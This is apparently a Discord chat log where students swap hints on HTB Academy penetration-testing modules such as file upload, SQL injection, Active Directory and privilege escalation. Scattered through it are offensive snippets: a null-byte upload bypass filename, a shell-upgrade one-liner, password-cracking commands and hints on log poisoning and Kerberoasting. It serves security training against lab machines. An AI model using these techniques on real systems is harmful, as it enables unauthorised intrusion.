Has anyone else had ffuf display status codes, size, words, and lines , but not show the actual word used? I'm running into this issue specifically on the SQL map essentials skill assessment.

I have completed that module not too long ago. What are u having problem with ?

Hey! I'm stuck on Footprinting Lab - Medium, any hint is needed, please.

Did nmap for all the ports, found out the services, but all of them are under credentials that I don't have 😦

maybe -v is what you are looking for?

the only thing that is possibly available is a mount that I should mount through NFS, but in turn I get the mount with no access at all, because of nobody owner
leaving me with no clue on what to do next

Has anyone completed the 'Using Web Proxies' module? I am attempting to use the ZAP HUD on the browser to search for a high level vulnerability and exploit it to read the /flag.txt file. The HUD will not respond to commands, and I'm only getting Medium level alerts from running active scan. Need some guidance please.

use Spider and then use Active Scan to get the alert you are looking for 😉 you can also stop the Active Scan once you have found the alert

read again the exercise and the hint! Once you decoded the cookie you need to do the same in reverse with the payload options

any help with the Windows Local Privesc module

I'm on the skills assessment and having trouble after the foothold

Anyone wanna gift me the AD modules

@topaz lantern TYVM I will try that out.

@swift cove I just did this last night, if you keep having trouble let me know and I'll help, but not giving away answers 😛

@topaz lanternRan spider, now running Active Scan, I'm sensing that this will take awhile to run all the way through, is that correct?

not needed to have it completed, around 45% should show you the Alert. PM if you like for more hints haha also remember to increase the speed of the scanner

Can anyone provide me a nudge on FIle Upload Attacks, skills assessment?

So far I have managed to:

||Upload .svg images and get the source code for:

upload.php and common-functions.php||

Get past the blacklisting for sure, could be I passed the whitelisting and got stuck in the MIME Type / Content-Type, or did not even pass the whitelisting as the error for these two is the same: "Only images are allowed"

Can anyone give a nudge with the skill assesments on common webapplication 1 with the exploit step? Or with part 2 with the wordpress url (got the rest of part 2 done)

Could I have some help with the File Uploaf skill assesment. I am able to upload a malicious file but i am having problems finding where the upload directory is

Oh lol we are on the same problem

@naive ravine Fuzz for extensions. Use a double extension. Make sure you have the correct Mime type AND Content type.

@raven cairn try using XXE to read the page source code , it will reveal the upload directory as well as how the file is renamed

@rustic sage feel free to DM me about Footprinting

Can I have help with how the file is renamed in the file upload skill assesment? I am having trouble deciphering the php

Dm

Hello everyone, I'm Hi everyone, I'm new, I'm not for gnente good in this field, please... Is there anyone who can teach me?

The modules are structured in such a way that you can teach yourself the content through self-study. Afterwards, you can put what you have learned into practice.
If you get stuck somewhere, ask here for help. You will surely find help.

Shout out to whoever wrote the "Learning Process" module. I'm getting a lot of out it, especially the "Learning pyramid".

Yes, I got it, thanks. DM if you need help.

Hi All with regards to my earlier request on File Upload Skills Assessment, I managed to upload a payload using the ||fuzzed double extension: sh.php\x00.jpeg||

However, I cannot find the file when I try to navigate to it from the URL:

Can someone give me nudge in the right direction?

some body coul help me with command injecton challenge ?

DM me.

I don't have notes on it, but I can try to help. DM.

Could someone please help me with the question in AD Enumeration & Attacks - Skills Assessment Part II: Use a common method to obtain weak credentials for another user?

Did you find the answer? I'm stuck on the same question. Do you have any advice?

I've tried password spraying and credential enumeration, but the privs of the user are very limited so I can't perform most enumeration with PowerView, cme, etc.

@lament crag DM me 🙂

@idle kestrel try utilizing the techniques shown in the "internal password spraying from windows" section

Thank you and I gave that a shot, but the username auto detection doesn't work. I created a list of valid usernames from the /opt/jsmith.txt file, but still no dice. Any more hints?

Could someone point me in the right direction on SQLMap Essentials module? I am super stuck right now

dm

Hello, could someone help me (a slight nudge)? I am a bit confused by the SSRF section in the Web Service & API attacks

would doing all the modules in academy from tier 0 - tier 2 make me a decent pen tester?

or is it not enough

to become a decent pen tester you will have to dedicate years

so yes ?

because these modules will take me a few years

#giveaways

Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)

INTRO TO NETWORK TRAFFIC ANALYSIS

Tcpdump Fundamentals

Hints?

Find and submit the contents of the TXT record as the answer. Been at this too long, getting nothing. Can I get some help with the correct command please?

dm

im currently working through the shells & payloads module

and i cannot stay connected to anything. VPN connection shows no problems , but when i'm RDP into windows box it crashes and dies for 10 minutes and cant log back in

same exact thing happened on previous quest/part

for linux box where it took me 30 minutes of logging in with corrrect credentials to establish bind shell

is there general problems with this section and these boxes. Really frustrating taking 10x as long to do something bc it wont stay connected (i'm hardlined/ internets fine on my end)

Just do it and you'll find your answer

I also have this issue sometimes. Try again tomorrow, I felt its a bit random. Often it just works fine 😅

Have you tried dig ?

Yes mate, a few different variations of it. No idea what I'm missing now!

DM me

Hi all anyone up for a nudge on File Upload Skills assessment?

dm

what are you stuck on?

Hello mates, did anyone completed the "ATTACKING WEB APPLICATIONS WITH FFUF" module ?. I'm stuck on parameter fuzzing, can anyone help me please !!

write me in DM

Anyone that could give me a nudge in the right direction with the Command Injections skill assessment? i have a general idea of what i should be doing but im hitting a wall

@lethal latch DM me 🙂

@idle kestrel Did you make any changes to the DomainPasswordSpray.ps1 file? I had to edit it slightly to make it run, there was an error on a certain line of the script

Am I still able to view a module and read it after I finish it?

Hello guys ! I am super new and stuck in the first module 😅 In http module I did curl inlanefreight.com curl-O inlanefreight.com/download.php and did ls and cat download.pho but could not find flag 🥺 Is there any chance can you help me to find my mistake

Yes, thanks! Problem was my username enumeration was wrong. I needed to target the DC instead of using a /opt/jsmith.txt. There’s a bug though where enum4linux will fail when requesting a user list. I had to enumerate all to get the user list.

d

Hi, someone may help me for this question : "Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78)." (Module - BloodHound Skill assessments)

hello, could use a some help with shells & payloads module section on live engagement if possible

working on the server-side attacks module on the first SSTI Exploitation Example, where would the environment variables normally be found if i have RCE on the box already?

EDIT: nvm im just a linux noob,

although i do need help installing tplmap, the installation instructions in this module did not work and im not sure why

can anyone provided me some direction with Weak Bruteforce Protections question 2: Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag? Please dm me. I think I know what needs to be done but I cant seem to get it to work

Good evening or other day period folks!

would doing all the modules in academy from tier 0 - tier 2 make me able to do some htb boxes?

i need some help with lfi module skill assessment. I have found the panel and im trying to poison the access log but it just won't give me the cmd result

help

I've completed the basic toolset path, am at 74% completion on jr pentester path (of what is available for now) and 82% of the bug bounty one, took lots of notes, watched a lot of ippsec videos on yt (taking notes) and completed the getting started section of htb. I say I can get something going on a box, but not yet at the point I can complete one without help or hints. Not close at all, but sooooo much closer than I could've imagined months ago!

hallo

how long has all of this took you

@simple merlin DM me 🙂

hey, I was wondering if you've had some luck with this. I'm stuck on this question and I'm not sure how to proceed 🙂

Can anyone give me a hint about the wordpress url in common webapplication skill assesment part 2 ? Answered all of the other questions but im missing how i am supposed to find this url.

hey guys can u help me plz
i can not solve this question
Broken Authentication Bruteforcing Passwords
i use this regex for rockyou-50.txt
grep '[[:upper:]]' /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '^.{3,20}$

A couple of months (3-4) actively except workdays. But I had a head start with Linux since I use Linux as my only OS for years. Also took a free (was lucky for a giveaway) udemy on WiFi hacking. Cracked htb last year (1-2 months), took a break and started back in early April.

Hy From introduction to Networking , Subnetting part , Q(broadcast address of the following CIDR: 10.200.20.0/27) , what the correct Ans , I tried but not work.

I'm doing the login Brute Forcing skills assessments "Website", Brute forcing the admin page, what wordlist did you guys use?

is it not .31?

Anyone able to give me a nudge on the Active Subdomain Enumeration module FQDN for 10.10.34.136 ?

I am doing os corporate recon module section Email Addresses, and I do not get emails gathered from theharvester.py, also harvester does not support the source netcraft anymore? I think I need help.

How much pwnbox usage do you get if you buy 50 cubes? Says you get to use it but doesn't say how many times or how long for, compared to say a month sub which is unlimited

can anyone help me with command injections skill assessment?

dm me pls

if anyone has done the server side attacks skill assessment and could give me a little help i would appreciate it

yeah that's right it's 31.I puzzled by CIDR, can I DM you for remaining two more

@devout cliff have you viewed the page source to find the javascript function?

yep i see the jsquery and have decoded the vars

@west canopy just not sure after i get those and 'fix' them what im supposed to do. im reading the jquery.js and see its doing some function to them to make another var but im not sure what its doing exactly

DM me 🙂

if you're still having trouble

sure

@west canopy I know I bug you alot, just want to make sure I'm on the right track. Can I DM you about the brute force skills assessment?

@novel echo sure

HTB Academy - Broken authentication > Predictable Reset Token (first question). I am trying to find the token with a modified script and I feel like everything is as it should be, but somehow I get nothing after those 2000 iterations. I may be making some mistakes when selecting/converting the timestamp into epoch? Not sure what I am missing... Can anyone please help me and give me a nudge in the right direction? DM me?

not yet lol, i just skiped to a different module. whenever im stuck i come back to it in like a week and will always wonder how I got stuck in the first place 😛

Stiull need help Footprinting - SMB - last question

ive walked through everything and cannot for the life of me understand what the fuck its supposed to be

for full path

/etc/samba/?

like idk

HTB Academy / Connexion Bruteforcing / last question
i got a pb with the wordlist idk wich one i got to use cause it telle me 145h both so idk if i got the good one or not can someone help me on this i'm block since 2 days on this ...

@west canopy

@rustic sage

@versed zealot plzz buddy can you help me

I am going crazy in the module Password Attacks - Skils Assessment Hard
I have a foothold with 2 users credentials on the server. Get a vhd file that I tried to decrypt with no sucess. Do I need to try harder on this file or on other things on the server?

any hint on module Attacking Common Services section Attacking Email Services i got the username (and the mail i think) i try brute force every service on that box but no luck i don't know what to do next

dm

any hint on the FQDN of 10.10.34.136 from the Active Subdomain Enumeration part? Im still not sure how to get the information of the different zone. nevermind, just found it

dm

Hello everyone! Need some hint for question in Nessus Skills Assessment
of VULNERABILITY ASSESSMENT module. Question is: " What were the targets for the authenticated scan?" I dont get it. What I should to find?

Solved. Nevermind..

hi

i am new player

Hi 🙂

whats up bro

Hello all 😀 I have a problem when installing Parrot OS on VMware and on Vultr. For some reason when I follow all the steps layed out in the HTB academy it won't reach the login screen. And will go straight back to the try/install screen. How can I solve this?

OK tonight is the night. I Need help to complete the last assignments of both broken authentication and attacking common applications. Anyone? 🙂

Still stuck?

@sweet heron yes…

Hydra takes like 3600h

There are no modules on Academy that have bruteforcing taking longer than 5 mins (maybe except in password attacks). DM me, we'll figure it out.

still need help / push /hint on Footprinting - SMB last question

at a loss for how im supposed to find the file path for it

Are you allowed to post write ups on module skill assessments?

@low vine Try connecting with rpcclient and numerating from there

I had tried connecting to rpcclient for hours

and literally 5 mins ago i finally was able to connect

<

so infuriating to waste so much time on that

😦

https://tenor.com/view/kid-scream-no-cry-mad-gif-11222953

I might be able to help

My hero! I'll DM

lol

Wordpress module, exploiting a vulnerable plugin: Is it normal doing exactly the same exploit from the module, but getting nothing? When I manually access the file count_of_send.php, I get some warnings and nothing using ?pl=/etc/passwd (it just hangs).

@sweet heron What you're describing matches what I have in my notes so I think it should be working

getting no luck with the rce too... weird.

Warning: system(): Cannot execute a blank command in /usr/src/wordpress/wp-content/themes/twentynineteen/404.php on line 2

nevermind. xD

So it's a bug? Same path, target is accessible. It hangs for a while and then shows a timeout error. Curl just hangs forever.

can I ask for some direction for the final assessment in module of "Web Attacks" please? I have got info from IDO, but cant login with that piece of info

It ended up working on my host, but not on my kali machine... weird.

Sure where are you stuck. Can also DM.

thanks, will DM you now

Hey guys. Can anyone help me in the skill assessments of windows fundementals? I’m trying to create a security group (saw that as AD) and all the commands are not recognised in the machine, thinking I’m wrong in one of them.

can someone help me with the metasploit fundementals problem where we have to exploit the older version of sudo?

hi i wanna learn hacking

withouth linux

https://tenor.com/view/cat-catcry-gif-19131995

if anyone is available to answer a question about the broken authentication module let me know

why limit yourself? Would you build a house with just a screwdriver?

Dm if you still need help

Go to the port 5000 website and you will see the name of the application! or look at the Http-title of this port. then look for this name in the MSF.

Hey Guys, Im doing the File Upload Attack Assessment but i have trouble to find the upload directory

any hints?

hello everyone, who has made USING WEB PROXIES module?

i think i have that assessment done, dm me

Bruteforce module, Skills Assessment does someone knows if the list that we have to make with cupp is about Harry Potter or Daniel Radcliffe ??

dm

I'm following this image setup but can't capture responses traffic, any clue | hint why can be?, this is related to Web Proxies module..!!!

Hi guys, just started and I'm doing the Web Requests (HTTP Headers) atm, the question is asking for the flag, I believe and I found it but can't submit it correctly, any ideas what I'm doing wrong?

which task and question is this for?

HTTP Headers in the Web Requests

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

could you send a (spoilered) screenshot of your question/issue?

That's fine to post here or do I DM?

man it should be fine

im new to this server too thought so im not too sure

but ive already completed that section

just yesterday in fact

yeah man youre doing another module ive got no clue on that one

All good, thanks anyways

Does anyone know how to find this exploit in Metasploit CVE-2018-15473?

have msfconsole running
type command 'search cve:2018-15473'
type command 'info 0'

@quaint marsh

Thx

Hello, need help with shell&payloads module section assesment, "Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt" I have a payload on exploit-db to use but its not present in msfconsole. Does this need to be added manually to pwnbox?

pls dm me if anyone can assist me here

when using burp intruder, if i need to find a .html file in the admin directory is this correct way to structure the pointer

If you need to find a directory or file inside of the admin directory, it would be GET /admin/$$.html

Obviously, the $$ stands for your two pointers.

ohhh i see what you mean thanks !

Sure thing.

Hey - anyone had issues with the bloodhound module? Doesn’t like the example zip files that are provided for the questions

@fading raptor yep , I think the version of bloodhound on my VM was not compatible with their bloodhound data they provide. I had to use Pwbox

Rightio! Thanks man, I’ll get on the pwnbox

Any one do the Linux Privilege escalation Academy module? Could use some help on the final skill assessment. Stuck on getting flag 4.

@wheat garden sorry if this is a silly question but have you nmapped the target?

new to discord chat here thanks for this this tip has allowed me to continue the skills assesment if I get stuck again ill be back on here

saw a past tip you gave its allowed me to continue

I established a vpn connection inside my vm but I cannot ssh to the target, it works fine on the pwnbox in the browser tho? anyone has a quick fix?

did you have to get a private key?

attempting to get wine installed are parrot and I'm getting this error winehq-devel : Depends: wine-devel (= 7.9~bullseye-1)
E: Unable to correct problems, you have held broken packages.

The "get vpn key" in the target box? @rich pumice

yeah, you might have to log in like this: "ssh -i "path to key" your_vpn-admin@ip

@west canopy got the 4th flag in Linux privilege escalation module. Did a search on the whole system as the tomcat user and didnt even see 5th flag. But attempted privilege escalation of netcat shell using the gtfo busctl though that appears to not be working for me. Used a metasploit module too to get a shell though still unsure how to leverage busctl command as root to gain privileged access. Unsure what to do from here.

@wheat garden the gtfo busctl is the right path, try and upgrade your shell first. python -c 'import pty;pty.spawn("/bin/bash")'

Hi guys im in the part of jobs of metasploit and i need to see wich exploits the target is vulnerable
How do i know wich exploits the target is vuln?

THank you 5th flag gotten though will note for me python -c 'import pty;pty.spawn("/bin/bash")' did not work had to use python3 "python3 -c 'import pty;pty.spawn("/bin/bash")'

nice work 🙂

can you help me?

@rustic sage I think you'd want to background your meterpreter session and run the local exploit suggester

Not sure which section / question you are on though

Metasploit, Sessions & Jobs

thank you appreciate your help

so how do i make it?

Did you ever find the answer to this? I found the GET request in the devtools and found the text file, but the flag within the file is not rendering. Thanks

DM if you would like to go through it. You will kick yourself 🙂

hi guys, i'm having a problem with Information Gathering - Web - Skills Assessment, in question 3 "Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?".

I've already tried doing all the commands to find the nameserver, but both nslookup and dig find nothing, and i.imgur.com returns the response code 302.

imgur.com also returns four server names (none of the four is the answer), but they all seem to return Transfer failed when I run the dig command for AXFR records, and the https://hackertarget.com/zone-transfer/ site also returns Transfer failed for the four servernames as well

Could anyone give me any hints as to what I would be doing wrong? or if there is a problem with the question itself

did you end up working this one out?

@tight mesa I found if you set these Interception Rules for the client and server responses, You will see the HTML response in the HTTP history tab of Burp.. Then if you refresh the web request to the page in Firefox with Interception turned on.. In Burp, Right click anywhere in the request --> Do intercept --> Response to the request --> Then the HTML will be reflected in the request, then you can manipulate it.

I'm stuck on the AD Enumeration & Attacks - Skills Assessment Part II. I have an open xp_commandshell, but I don't know what to do next. What section of the course should I look at to move forward?

hello, i'm having a hard time on this question : Which ACE entry can be leveraged to perform a targeted Keberoasting attack? | on AD enumeration and attacks course.

what the f

just got correct answer idk what did I change

Hi, I am doing skill assessments-web proxy and I am struggling with it. I only got the flag for the second question. Please come to my rescue

dm

Hey, i'm just wondering if anyone can give me a hand i'm on the Privilege escalation part of "getting started" and i have the id_rsa file on my attacker box and used chmod 600 on the file but when i try and ssh with -i id_rsa it says

"load key "id_rsa": invalid format

Any clues?

Make sure you let an empty line at the very end of the key

after the -----END PRIVATE KEY-----

oh

i just realised

i didn't copy the "START OF KEY" "END OF KEY" stuff

just the code inbetween

Copy everything and let an empty line

you'll be good then

lmfao i took too long and the target expired so have to do it again 😄

got it! Thanks dude!

You get things sorted with Karti? Really simple mistake, was definitely kicking myself when I found it.

Module AD enum & exploitation
question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

I cannot find the commands to find the answer

bg or background

Bonjour everyone. For those who finished the shells & payloads, were you able to connect to Nomachine via the attackbox?

The latency is real bad and it keeps disconnecting

https://cdn.discordapp.com/attachments/980097838035918858/980478630369062932/unknown.png

It is possible after Intruder is finished filter the results and save the working payloads?

in burp

DNS lookups are a form of passive recon. Passive recon basically means collecting info on an org while not connecting to their infrastructure. The question states to perform active infrastructure recon against the host, so go to the host and look at more than the response code

Hey all, anyone available for some help with the skills assessment on Web Service and API attacks? I don't understand how to read the SOAP and use it to find an SQLi...

dm

Hi guys ! I have a question about "cracking common hashes" part of the hashcat module ?

You'd better ask it directly

I'm on pwnbox and my hashcat constantly get "exhausted" but he doesn't test all the possibility... Why is it happening ?

what's your command?

hashcat -a 0 -m 1000 hash rockyou.txt -r /usr/share/hashcat/rules/best64.rule

looks good to me... what section of the module?

cracking common hashes

I just tried with another rule file and I cracked the hash....

What is weird is when I launch my hashcat even without rule file I get an exhausted in like 5sec...

In previous modules everything was working fine, I didn't get any exhausted before...

I remember having a similar problem, but don't remember what was the problem. You hash is between ' ' ? It's indeed an NTLM, so this part is ok. The files are accessible (tab command completes well?)

My hash is written in a file, but he is not between '' in the file. That can be a problem ?
Yes all files are accessible

try it straight in your command between single quotes maybe?

Nope doesn't worked, I always have this exhausted... But if I use the correct rule file I cracked the hash (because hashcat find the password before the he get exhausted)
When I launch without rules hashcat get exhausted after 5s but if I put a rule file he is exhausted within 30s and 1min30

I'm launching my command in root can it be the problem ?

can we see a screenshot of the hashcat exhausted? Is rejected is at 100% or 0?

no

Well, it looks like the command did work properly. Password is not in rockyou (and I confirmed). Try a smaller rockyou (like the 50 one) with rules. As long as it doesn't reject them all, it means the command worked.

Okay, I wasn't believing he did the whole rockyou in 4s, that surprised me 😄

I just try on one of my vm and my vm is as fast as the pwnbox, I thought that was way slower, my bad !

with my GTX 1070, it takes 2 seconds. Exhausted just means it didn't find the password. I though the problem was it instantly rejected all possibilities. I didn't find the password either with best64 rules. Use generated.rule, you will find it.

Yep, I got it ! Thanks for your help !

It depends of the hash you are cracking. Some are faster than others.

I am stuck on the NSE portion of the NMAP enumeration module. I have tried several different attempts to enumerate the flag. Can I get a nudge?

dmed

what is the command to execute?

@summer canopy DM me 🙂

anyone got any idea how to scp files to the pwnbox on academy? when i connect to vpn with my vm, it gives me the same IP address as the Pwnbox so i cant scp. however the module says i must scp in order to progress as bloodhound is broken

@fading raptor if i have to transfer files to pwnbox i will just use my google drive or something like ufile.io

Hey 👋🏻 can someone help me a little with the module Web Attacks (Skills assessment section)?

Sure, you can DM.

anyone around that can help with linux basics module?

@sudden ocean i can try! which section / question?

system information, having issues figuring out the path for mail and network interface

im super new to all this lol, i appreciate the help

try running the command: env

this will show your environment variables and should include the path to htb-student's mail

for the network interface try the command: ifconfig

basically the linux equivalent of ipconfig in windows 🙂

see i dont even know what ipconfig is lol,

i believe i found my answers though thank you!

hi, Skills Assessment - SQL Injection Fundamentals -> Where is the security flaw? In the form or elsewhere?

I can't seem to execute the LD_PRELOAD priv esc from Linux privilege escalation, shared libraries section.

Use the full path to the shared object?

OpenSSL idk, maybe say start instead of restart if it’s not running currently

I'm dumb. Yes, thanks!

lord these modules, maybe someone can help me w/ Active Subdomain Enumeration part of Info Gathering. I'm trying to get the FQDN for the ip addresses. I think I have the 2 zone transfers but i'm still having issues 😦

sigh i really hate asking such a noobish thing..... but I'm working on Linux Fundamentals (yes, im THAT new).....but I've been getting stuck on sections like Service and Process management. I feel like I'm.....just missing key concepts....but it's not been discussed before. Also.....my pwnbox keeps asking for a password when I try to engage commands like "systemctl start ssh."

I'm at a loss at this point. I can su to root, or sudo my way out of it, but password? did i miss something in my own interface? Feel free to DM if you dont want to embarrass me publicly heh.

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox

Control+F to "randomly generated user password". Right after that is a graphic that shows how to access the password

I never would have known. Thanks tremendously!

np

No, not yet. I'm still at a loss.

Hi, I was wondering if anyone could point me to the right direction for the "Broken Authentication" module - "Weak Bruteforce Authentication" q: "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag?". To my understanding, I am meant to use curl, with the "X-Forwarded-For" header, but I can't seem to get it to work.

Hey, did you manage to get this?

Hi all, anyone able to give me an assist on the active directory module, specifically the part about windows enumeration living-off-the-land. The second question is "What domain user is explicitly listed as a member of the local Administrators group on the target host?" - any hints as to how I can find this?

Never mind, I figured it out

I'm being stuck at Command Injection - Skill Assessments. I've already found which parameter to inject malicious code but final payload is a tough task. Anyone give me a nudge

?

hi, Skills Assessment - SQL Injection Fundamentals -> Where is the security flaw? In the form or elsewhere?

Nevermind, I've just got the flag. I've completed all bug bounty path, should we take CBBH exam?

hi all. Anyone can provide hints for password attack - Credential Hunting in Linux question? I don't understand the hint (Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.)

The password provided in resources has loveyou - so I created custom wordlist (hashcat --force -a6 password.list ?d --stdout) to generate custom wordlist with number ; then realize LoveYou so I generate another one using toggle2 rules - but it seems I'm going to wrong direction because it's not related to the credential hunting in linux?)

Hey, can i have help on the Locations questions in the OSINT: Corporate Recon Module ? i got the good cities and use the right search engine but didnt got the good 4 digits

dm

Are SMTP password brute forcing times reasonable in "Attacking Common Services" - "Attacking email services"?

Never mind. Brute forcing times are quite low if you know what to do.

everything seems to be simple there. scan ports. then you look for an exploit in Metasploit for servises on port. you launch it. you turn off the Meterpreter using the BG command. Well and further you raise privileges.

@blissful verge any guestimate as to when the pivoting and tunneling academy module will release?

Hey Guys,
Can someone give me a hand on AD Enum Skills assesment part II ?
I'm here : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I've got a shell but I can't write on disk so I'm not sure how I can elevate privileges

Hi, I would like to have ideas for one of the questions in module "Command Injection - Advanced Command Obfuscation"

I have used the intended way( i guess) to find the answer as well as unintended way, both of them are lead to the same result. But when I submitted it, it was incorrect

can anyone give me some ideas please?

dm

any in hint on how to get the flag in module Attacking Common Services Skills Assessment hard i got the user with the admin privileges

what is the best was to crack wp-user passwords?

hello, could someone give me a little hint of the last exercise of the ssti module?

Is it necessary to use AJP proxy?

DM me

how to connect to web interface in Vulnerability Assessment-Nessus Skills Assessment?

Port 80 is closed. but given credentials! through RDP?

nessus is on port 8834

web interface Nessus?

Why Authenticate to 10.129.245.120 with user "htb-student" and password "HTB_@cademy_student!"

yes

Navigate to the web interface at the end of this section and log in with the provided credentials.

Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100

some kind of nonsense!

They give you one IP and ask you to scan a completely different one!?🧐

Are you Pass this module?

yes

in this task you don't need to scan there are scan result you can just use that to Answer the question

Can't be! Why create an instance then?

i try

Hi guys! I am newbie. I recently started taking the WordPress module and reached the Skills Assessment. And right from the start, I had a problem. The test questions are related to wordpress and the module itself is also dedicated to it, but when I try to scan the target with wpscan, I get an error that the site exists but it does not use wordpress. When looking at the source code of the main page, I also did not find evidence that it uses wordpress. Also, I tried to check the main wordpress directory and got a 404 error. Can someone tell me if this is right and I need to search solution or it's some kind of bug?

Hey all, in Information Gathering - Web Edition, question # 2:
Which CMS is used on app.inlanefreight.local? (Format: word)

The answer is obvious but the website will not accept my answer, anyone encounter this?

Nevermind, I needed an ! to complete the answer.

hi, anyone who can give me a hint about how to find the other directories on "Repeating Request" under Web Proxies module

did you find all the answers?

yes

I went through pwnbox to the site https://10.129.100.169:8834 on nessus. there is already a completed scanning report. I took the answers from it. besides this: What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?

Where to look for it?

hi, anyone who can give me a hint about how to find the other directories on "Repeating Request" under Web Proxies module, I tried using wfuzz but is not resolving the IP_Add:Port_ID

Created a report in http format by module. got a number there.

sorry i didn't see the message in the Windows authenticated just click in the darkest red (critical vuln) and copy the plugin ID on top

if my student academy sub runs out will i still have acesss to the modules that I have completed?

@pliant summit yep

OpenVAS ready?

?

if your question is have i done that then the answer is yes

Hello, can someone help me for "Skills Assessment - File Inclusion" ?

anyone who had made "Using Web Proxy" module..!!!

hi what we do here

@sand cloudhi

Still stuck? @tight mesa you too?

setting up proxy chains, I set the the proxy list to http 127.0.0.1 8080 and https 127.0.0.1 8080

but when I run curl with the proxychain it says its invalid?

This is intended. Keep looking around the target

if I only set proxy chains with http and not https, then it will fail to connect to the server, but I can still ping the server

Alright, so looked like when i opened zap it was set to port 8081, but burp is set to 8080 and that will allow it to work, but still can't get https

Limited File Uploads, is it broken? The Upload bar is gone:

Thanks! I'll try

Hey guys any help finding the web application running its part of skills assesment on Using Metasploit

hey in introduction to active directory module, guided lab part 1, am I creating a new group for the new hires in the first task or am I adding them to an existing one?

Hey hey someone i can DM for a sanity check on File Upload Attack assessement ?

||check the first picture: it show which app and the version in the comment||

DM me

thanks!

Any help on File Upload attacks: Skill Assessment, where am I supposed to get the info where the file gets uploaded?

dm

@sweet heroni figured it out thanks 🙂

Has anyone completed the AD Enumeration and Attacks Module?

Hi im stuck with sqlmap essentials case 10 any hint ??

You have generated a mut_password.list use it, feel free to DM if you need more hints

looking for a nudge on skill assessment Broken Authentication, please DM

Hey guys, anyone who finished Web Attacks - Skills Assessment that could give me a hand?

Hello, did you get help with skill assessment for broken authentication? I'm stuck and could use some advice if you have completed it. tyvm

Hi, I don't understand what I need to do at Attacking Common Services, Attacking RDP. I assume it is something like RDP Hijacking, but I cannot find any other RDP user..

dm

aga sa

hi@all...:)..

i have questions about DNS zones....if i did a request (with dig or nslookup) how can i identify how many zones exists? i hope the question is understandable...:/...

if you can't do a zone tranfert that it's often the case you need to do enumeration with tools and wordlits

hmm...okay...

Hey Guys, im struggeling with the File Upload Attack Skill Assessment. I have couple of working File extensions, Content types and File Signutares but im not able to find the right combination.

any hints?

Hello, is anyone doing the AD Enumeration and Attacks Module?

dm

@plush falcon i've completed it , do you need help? 🙂

Yes, can I dm you?

sure

Looking for help on the Kerberoasting from Linux portion of AD enum and attacks module

anyone any good with webrequests? im stuck on the POST one

@rapid pine DM me 🙂

@sudden ocean DM if you still need help !

who wants help

dm

I hacked all the boxes

On the Zap fuzzer tutorial page, I found the flag, but it's saying it is wrong?

hey anyone who can successfully done the "proxying tools" section from using web proxies module

I'm doing what is described in the section with no success

and I'm not sure what can I doing wrong

That message usually means you're using the wrong mode in hashcat

Hi, Im working on Attacking Common Applications - Skill Assessment 1
I've tried several exploits but they don't seem to work and the manager console is not accessible on the vulnerable app
Could I get some direction?

nvm i got it bc i tried harder 😈

@west canopy

Anyone finished the HTTP Headers flag request, using the Network tab in the browser devtools to see what requests are made? I can't seem to find it. So either there is an issue or I am blind. Need a bit of nudge, thanks.

Hey everyone, I'm stuck on Module 18. I'm able to SSH in, but it's not accepting my password.

Hello, i have question about SSRF from Server Side attack.

How do we know to refer to the file
internal_local.py and how do we know we are referencing internal.app.local?

I did this, but I would like to know where it came from

Hello, I'm stuck on USING WEB PROXIES: Burp Intruder.
I get answer by using ffuf. But when I start attack with Burp, I get 408 response even if URL is correct.
Can somebody help me?

Hy, Target machine is not accessing using SSH , Timed out, what's the reason?

or when i use port number it's say connection is closed.

Hello someone have a minute? i have problem with SSRF in Server side module

Did you check if the machine is still up? Sometimes you run out of time to use them

I did every thing, reload page , close and again sign in into academy.

So just did the Web Service & API Attacks Skills Assessment, but completed it in a different way to how you are supposed to. Would love a nudge on how to complete it properly!??? Can anyone assist?

SOB!!! I just realized I wasn't connected to the VPN🤬

has anyone done kerberoasting fromlinux?

im stuck like this nothing happens. Any ideas?

then says connection timed out

what module is that from?

attacking active directory

i have not done that module but i have seen that used in a ctf event before. I wonder if you need the ip part.

i would think if the domain is in your /etc/hosts that you would not need to specify it

im using their attack box

ANy one do windows privilege escalation module? Actually very early in the module section "communicating with processes.

For last question on that section seems I need to run a command accesschk.exe though it doesnt appear that its installed on the windows VM provided.

@wheat garden check the directory C:\Tools\

Gracias senor. Yes running .\accesschk64.exe in that directory worked.

Is it possible to have a full url encoding in fuzz ? The url encode does not do the same thing

Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.

I know the answer but I'm trying to figure out how to get it.

It says to use powershell but up until this point. I've used bash to RDP and SMBclient.

What am i missing? Can anyone explain the steps to get this answer for me?

Hi! I'm back with a question for the Skills Assessment - WordPress. When I got the target, there was a site without WordPress. After searching for information on it, I went to a site with the domain www.inlanefreight.com/ and checked it. And with the help of wpscan and in meta name="generator" I determined the version 5.6.8 Also, through the theme file, I got the theme version. But both answers are wrong. Am I trying to check the wrong resource again? There, in the links, there was also a link to blog.inlanefreight.local. Maybe you need to check it out? But the task is about public-facing a website. And if I understand correctly, blog.inlanefreight.local is only accessible over the local network.

Sorry if I'm asking stupid questions. I'm just new to this area.

I also found in one of the files in the accessible directory an entry similar to those that usually contain the HTB {Publ1c_D0cum3nt5_C@n_L3ak_Inf0} flag, but it also did not fit any of the questions

Yup, you should be using the .local version of the site. You might need to add both to your /etc/hosts

Thank you!

Can i encode strings in Kali Linux on the shell with a special command?

@leaden quail yes you can do base64 encoding by piping into the base64 command , and for url encoding there is the urlencode command

